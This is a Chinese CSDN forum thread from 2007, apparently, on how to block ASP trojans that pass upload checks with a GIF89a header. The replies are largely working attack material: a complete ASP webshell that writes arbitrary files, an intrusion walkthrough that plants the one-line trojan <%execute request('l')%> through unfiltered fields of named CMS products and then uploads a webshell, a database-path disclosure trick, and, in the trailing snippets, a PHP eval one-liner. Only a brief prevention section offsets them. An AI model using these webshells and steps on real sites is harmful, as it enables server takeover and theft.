社区
ASP
帖子详情
gif89a文件头欺骗(图片文件)如何防止些类木马上传!
yuanxiaolei
2007-04-29 01:20:46
gif89a文件头欺骗(图片文件)如何防止些类木马上传!
...全文
4147
25
打赏
收藏
gif89a文件头欺骗(图片文件)如何防止些类木马上传!
gif89a文件头欺骗(图片文件)如何防止些类木马上传!
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
25 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
yuanxiaolei
2007-05-21
打赏
举报
回复
自己打自己嘴巴..........
devms(来不及伪装成人)的说法是对的,我的说法才是错了。
实际上修改后缀之后的asp文件是不能运行的。之所以上传jpg或者gif格式图片之后,能运行木马,那是因为网站把图片存放到数据库里了,显示图片的时候又直接从数据库中读取图片...而那些图片中的asp代码自然会被当成asp代码运行......
我就是担心这个!!
Atai-Lu
2007-05-18
打赏
举报
回复
自己打自己嘴巴..........
devms(来不及伪装成人)的说法是对的,我的说法才是错了。
实际上修改后缀之后的asp文件是不能运行的。之所以上传jpg或者gif格式图片之后,能运行木马,那是因为网站把图片存放到数据库里了,显示图片的时候又直接从数据库中读取图片...而那些图片中的asp代码自然会被当成asp代码运行......
Atai-Lu
2007-05-17
打赏
举报
回复
devms(来不及伪装成人) ( ) 信誉:100 Blog 加为好友 2007-5-15 14:52:00 得分: 0
我玩这个的时候csdn社区还遍地sql injection漏洞,还用您来教我这些名词?哈哈
既然你们相信有漏洞,那么就去"防范"吧。不奉陪了..
=========================================
搞笑~你真的玩过将后缀改为jpg或者gif后的asp木马吗?估计没有,玩过的话就不会这么误导别人了。仅仅靠判断文件后缀来识别文件类型是不大可靠的......
Atai-Lu
2007-05-17
打赏
举报
回复
wtogether(wtogether) ( ) 信誉:105 Blog 加为好友 2007-5-6 13:43:34 得分: 0
不用担心,这段代码保存为gif文件没法执行ASP程序
=========================
你错鸟,完全可以在IE下运行修改后缀后的asp文件...
yuanxiaolei
2007-05-17
打赏
举报
回复
高人指点!
出家人专度女施主
2007-05-15
打赏
举报
回复
我玩这个的时候csdn社区还遍地sql injection漏洞,还用您来教我这些名词?哈哈
既然你们相信有漏洞,那么就去"防范"吧。不奉陪了..
yuanxiaolei
2007-05-15
打赏
举报
回复
一句话木马的使用
实例一:“一句话木马”入侵“EASYNEWS新闻管理系统”
“EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。
Step1 搜索入侵目标
使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站,在网站页面的底部版权声明处,往往会有关键字符为“www.****.COM 版权所有”。只要在GOOGLE或百度中以该字符串为关键词进行搜索,就可以找到大量的入侵目标。
Step2 检测入侵条件
在这里,我们以网站“http://www.****.com/news/index.htm”为例进行一次入侵检测。“EASYNEWS新闻管理系统”网站的留言本数据库文件默认是位于“\ebook\db\ebook.asp”,首先在浏览器地址栏中输入“http://www.****.com/news/ebook/db/ebook.asp”,回车后在浏览器页面中将显示访问留言本数据库文件的返回信息。如果在页面中显示乱码,则说明该网站的留言本数据库文件没有改名,可以进行入侵。
Step3 在数据库中插入ASP后门
前面提到了该新闻系统的留言本插件存在过滤不严,因此我们可以通过提交发言,在数据库中插入“一句话木马”服务端代码:
在浏览器中访问“http://www.****.com/news/khly.htm”,打开提交留言页面。在提交页面中的“主页”栏中,直接填写“一句话木马”服务端代码,其它随便填写。确定后点击“发表留言”按钮,文章发表成功后,即可将“一句话木马”服务端代码插入到留言本数据库中了。
Step4 连接后门上传Webshell
由于留言本数据库文件“ebook.asp”是一个ASP文件,所以我们插入到数据库文件中的ASP语句将会被执行。将“一句话木马”客户端中的提交地址改为留言本数据库文件地址,然后用浏览器打开客户端,在上方的输入框中输入上传ASP木马的保存路径,在下面的输入框中可以粘贴入其它的ASP木马代码,这里选择的是桂林老兵网站管理助手ASP代码。点击提交按钮后,刚才粘贴的ASP木马将被写入到论坛服务器中保存。
Step5 打开WEBSHELL
上传的ASP木马被保存到与数据库文件同一WEB目录下,文件名为“temp.asp”,因此我们在IE浏览器中打开页面“http://www.****.com/news/ebook/db/temp.asp”,输入默认的密码“gxgl.com”,就可以看到一个WEBSHELL了。
在Webshell中可以上传其它的文件或者安装木马后门、执行各种命令等,网站的服务器已经掌握在我们的手中,可以为所欲为了。
实例二 “社区超市”入侵动网论坛
Step1 检测入侵条件
以入侵论坛“http://www.****.com/”为例。首先在浏览器地址栏中输入“http://www.****.com/data/shop.asp”,回车后在浏览器页面中将显示访问"shop.asp"文件的返回信息。说明该论坛的社区超市数据库文件没有改名或删除,可以进行入侵。
Step2 在数据库中插入ASP后门
登录论坛后,点击页面中的“娱乐”→“社区超市”,打开社区超市页面。在该页面中选择商店申请,打开“商店申请入驻”页面“http://www.****.com/z_shop_newshop.asp”,在页面中填写任意信息,注意在“商店招牌”栏中,添加刚才的ASP代码"〈%execute request("l")%〉"。确定后点击“申请”按钮进行提交,即可将ASP代码保存在数据库文件中了。
后面的步骤就与上面介绍的一样了,只需要用蓝屏木马连接数据库文件“http://sdoygb.w2.****.net/data/shop.asp”,然后上传WEBSHELL就可以控制论坛服务器了。
实例三 “一句话木马”入侵未知网站
从上面的两个例子,我们可以看出利用“一句话木马”入侵控制存在数据库过滤不严漏洞的网站,成功的前提是一定要知道网站的数据库地址。对于一些使用了未知网页程序的网站,我们如何才能找到它的数据库地址呢?这就要结合暴库或者跨站之类的方法了,下面只是结合一个简单的暴库,介绍一下利用一句话木马入侵未知网站的方法。
Step1 暴库得到数据库路径
以“http://bbs.****.com”为例。在浏览器中打开“http://bbs.****.com/join/listall.asp?bid=2”,将地址栏中join后的/改为%5c,在提交后的返回返回信息中可以看到网站数据库地址:“’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’”,数据库文件名中加入了“#”符号,“#”符号在IE中执行时被解释为中断符,要访问该数据库文件则必须将“#”号变为“23%”才可以。因此数据库文件的实际WEB地址为“http://bbs.****.com/join/admin/adshuilonG!%23).asp”
Step2 注册网站,插入“一句话木马”
由于数据库文件是ASP文件格式的,满足入侵条件,因此现在我们需要将“一句话木马”插入到数据库文件中去。
在网页上点击注册网站按钮,打开注册链接“http://bbs.****.com/join/add.asp过滤了=step3&bid=3”,在资料填写页面处的站点名称或地址中写入“一句话木马”服务端代码,其它随便填写。然后点击完成按钮提交数据,木马服务端就被插入到数据库文件中了。
最后只需要用蓝屏木马连接数据库文件“http://bbs.****.com/join/admin/adshuilonG!%23).asp”,然后上传ASP木马就可以控制该网站的服务器了。
“一句话木马”的防范
要防范“一句话木马”可以从两方面进行,首先是要隐藏网站的数据库,不要让攻击者知道数据库文件的链接地址。这就需要管理员在网页程序中查被暴库漏洞,在数据库连接文件中加入容错代码等,具体的防暴库方法在这里就不作过多的讲解了。
其次就是要防止用户提交的数据未过滤漏洞,对用户提交的数据进行过滤,替换一些危险的代码等。例如中国站长联盟网站在出现该漏洞后已经对网页程序进行的修补,插入的ASP代码中的〈、〉和"等字符会被网页程序转换成其它字符,致使服务端代码无法正常执行。
只要作好这两方面的安全工作,“一句话木马”虽然无孔不入,但是面对这样的网站系统也是无可奈何的了。
yuanxiaolei
2007-05-15
打赏
举报
回复
听过一句话木马吗?
出家人专度女施主
2007-05-14
打赏
举报
回复
肯定有漏的。gif他可以用其他方式来执行asp程序!
--------------------------------------------
太搞笑了。估计有些人说server.execute啦,有些人说加个扩展映射到gif啦。搞笑搞笑
guzhongzhi
2007-05-14
打赏
举报
回复
gif他可以用其他方式来执行asp程序!
给点提示撒,谢谢!!!
yuanxiaolei
2007-05-08
打赏
举报
回复
guzhongzhi() ( ) 信誉:100 Blog 加为好友 2007-5-6 12:31:49 得分: 0
我用的判断后缀,有漏没,哪位大虾给点提示??
肯定有漏的。gif他可以用其他方式来执行asp程序!
lovenoerror
2007-05-08
打赏
举报
回复
关注中
guzhongzhi
2007-05-06
打赏
举报
回复
我用的判断后缀,有漏没,哪位大虾给点提示??
yuanxiaolei
2007-05-06
打赏
举报
回复
大家顶呀!
wtogether
2007-05-06
打赏
举报
回复
不用担心,这段代码保存为gif文件没法执行ASP程序
yuanxiaolei
2007-04-30
打赏
举报
回复
GIF89a
<body>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.createObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.createTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "输入马的内容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>
</body>
yuanxiaolei
2007-04-30
打赏
举报
回复
他还可以在中间加!
senmia
2007-04-30
打赏
举报
回复
判断文件头?
yezai
2007-04-30
打赏
举报
回复
强烈关注!
homelessboy
2007-04-30
打赏
举报
回复
?
加载更多回复(5)
【愚公系列】2023年04月
文件
上传
渗透测试之绕过白名单检查(
文件
头
GIF
89a
)
文件
上传
漏洞是一种安全漏洞,指攻击者通过网站
上传
功能
上传
恶意
文件
来攻击网站的漏洞。攻击者可以通过利用这种漏洞
上传
恶意
文件
来执行代码和命令,进而控制网站、窃取敏感信息等。常见的
文件
上传
漏洞主要存在于没有健全的
文件
上传
验证机制的网站中。白名单检查是一种安全机制,用于限制只有列入特定名单中的人员、设备或程序才可以获得访问权限,而不允许其他未经授权的访问。这种机制通常用于保护敏感数据或系统不被未经授权的访问和攻击。在白名单检查中,只有列入白名单的实体允许通过验证,而不在白名单中的所有实体都被阻止访问相关资源。
GIF
89a
GIF
89a
<script language="php">eval($_GET[shell])</script> 当不能使用php代码直接注入时可以改为phtml格式加入
GIF
89a
(
图片
头
文件
欺骗
),后台认为是
图片
,
上传
后再执行
木马
。
gif
文件
头
欺骗
gif
文件
头
欺骗
,
gif
89a
文件
头
检测是指程序为了他人将asp等
文件
后缀改为
gif
后
上传
,读取
gif
文件
头
,检测是否有
gif
87a或
gif
89a
标记,是就允许
上传
,不是就说明不是
gif
文件
。 而
欺骗
刚好是利用检测这两个标记,只要在
木马
代码前加
gif
87a就能骗过去。
Web-
文件
上传
漏洞总结
1、常规前端绕过 2、修改
文件
类
型 3、使用 .user.ini 或 .htaccess(可能还存在大小写绕过) 4、使用字典爆破可行后缀 5、结合
文件
包含漏洞使用
图片
马 6、条件竞争
关于 load-labs 的
gif
、JPEG、png三种格式的
文件
头
绕过结合
文件
包含漏斗实验成功全攻略
load-labs 的
gif
、JPEG、png三种
文件
格式的
文件
头
绕过实验, 网上使用的实验环境略有不同,有的编号是 Pass-13,有的编号是Pass-14, 请注意,这个实验成功需要2个必要条件: 1、
图片
马 2、
文件
包含漏洞, 也就是说,这个实验需要
图片
马结合
文件
包含漏洞一起才能成功,缺一不可, 相比,大家跟着教程做,
gif
格式的
文件
应该能轻松完成,唯一需要注意的是,写入
GIF
89A
的时候,要和 content-type 隔一行, 本文着重要说明的是,JPEG和png两种格式的操作流程, 网上
ASP
28,391
社区成员
357,060
社区内容
发帖
与我相关
我的任务
ASP
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
复制链接
扫一扫
分享
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章